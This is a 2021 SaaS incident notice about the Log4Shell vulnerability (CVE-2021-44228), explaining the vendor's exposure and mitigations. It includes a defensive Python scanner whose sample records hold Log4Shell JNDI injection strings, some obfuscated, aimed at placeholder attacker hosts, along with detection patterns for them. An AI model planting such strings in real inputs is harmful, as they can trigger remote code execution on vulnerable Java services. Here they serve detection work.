Security Assessment of Log4Shell Critical Vulnerability for SalesCandy
Incident Report for SalesCandy
Resolved
SalesCandy is aware of a critical vulnerability (CVE-2021-44228 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228), first reported on Friday 10/12/2021. The vulnerability affects a logging library called log4j, which is used by the majority of Java-based applications. It is now known to have been actively exploited since at least 2/12/2021.

We would like to assure our customers that SalesCandy does not use log4j, and we have determined from our cloud providers' reports (e.g. AWS; Elastic Cloud; Google Cloud) that they are either not susceptible or have taken the necessary steps to mitigate the vulnerability where applicable.

- AWS update:
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/

- Elastic Cloud update:
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

- GCP update:
https://cloud.google.com/log4j2-security-advisory

As a cautionary step, we have added new rules to our Web Application Firewall to detect and block inputs corresponding to the vulnerability.

Even so, we must not underestimate the danger of inadvertently passing malicious data on to our customers, even though we are not ourselves susceptible to the vulnerability. We have searched user-supplied data (e.g. leads, action logs) for evidence of attackers attempting to exploit the vulnerability and have not found any at this time. However, attackers are known to employ various methods of obfuscating their data to evade detection, and we cannot be sure that we have not missed anything. We are investigating methods to sanitise the data that we process in order to neutralise the threat.
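The two preceding steps (WAF rules that flag exploit-shaped input, and a search of stored user-supplied data that has to cope with obfuscated lookups) can be illustrated with a small scanner. The code below is an added example for this notice, not SalesCandy's own WAF rule set or search tooling. It assumes leads are plain dictionaries of string fields, and the sample records are constructed; the `.invalid` hostnames are placeholders. It collapses the common Log4j 2 lookup obfuscations (`${lower:x}`, `${upper:x}` and the `${...:-default}` fallback form) before checking for a `${jndi:` lookup, which is exactly the evasion the paragraph above warns about; it does not claim to cover every possible encoding.

```python
import re

# Constructed sample lead records, not real SalesCandy data. The "name"
# field stands in for any free-text field an upstream form could populate.
SAMPLE_LEADS = [
    {"id": 1, "name": "Alice Tan", "email": "alice@example.com"},
    {"id": 2, "name": "${jndi:ldap://attacker.invalid/a}", "email": "b@example.com"},
    {"id": 3, "name": "${${lower:j}ndi:rmi://attacker.invalid/b}", "email": "c@example.com"},
    {"id": 4, "name": "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.invalid/c}", "email": "d@example.com"},
    {"id": 5, "name": "Quote ${env:HOME}", "email": "e@example.com"},
]

# Innermost ${...} with no nested lookup inside it; resolved inside-out.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Log4j treats lookup prefixes case-insensitively, so match that way too.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any remaining ${prefix:...} lookup: not RCE on its own, but still suspicious.
ANY_LOOKUP = re.compile(r"\$\{[^}]*:[^}]*\}")


def _resolve(body: str):
    """Return the value a Log4j 2 lookup body collapses to for the
    obfuscation forms we model, or None to leave the lookup in place."""
    # ${prefix:key:-default}: when the key does not resolve, the default
    # (attacker-supplied text) is substituted. ${::-j} is the bare form.
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, key = body.partition(":")
    if prefix.lower() == "lower":
        return key.lower()
    if prefix.lower() == "upper":
        return key.upper()
    return None  # e.g. jndi:, env:, date: are kept as written


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse innermost obfuscation lookups until nothing
    changes. max_rounds bounds work on pathological input."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def scan_record(record: dict) -> list:
    """Return (field, severity, normalized_value) findings for one lead."""
    findings = []
    for field, value in record.items():
        if not isinstance(value, str):
            continue
        norm = normalize_lookups(value)
        if JNDI.search(norm):
            findings.append((field, "high", norm))
        elif ANY_LOOKUP.search(norm):
            findings.append((field, "medium", norm))
    return findings


def scan_leads(leads) -> dict:
    """Map lead id -> findings, for leads that have at least one finding."""
    results = {}
    for record in leads:
        findings = scan_record(record)
        if findings:
            results[record["id"]] = findings
    return results


if __name__ == "__main__":
    for lead_id, findings in scan_leads(SAMPLE_LEADS).items():
        for field, severity, norm in findings:
            print(f"lead {lead_id}: {severity} in '{field}': {norm}")
```

Run over stored leads or action logs, the normalised value is what a reviewer should look at, since the raw field may show only `${${::-j}...}` fragments. The same normalise-then-match logic is what a WAF rule needs in order not to be bypassed by the `lower:`/`:-` tricks; a rule that matches the literal string `${jndi:` alone would miss records 3 and 4 above.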

We urge all customers to carefully assess the lead generation platforms that pass leads to SalesCandy, as well as any integrations with the Graph API or CandySync Webhook that receive leads from SalesCandy, and to apply the necessary mitigations to ensure that attacks are not passed through.

Please contact our Customer Success Team at support@salescandy.com if you encounter any data that looks suspicious or require more information about this subject.
Posted Dec 14, 2021 - 17:21 GMT+08:00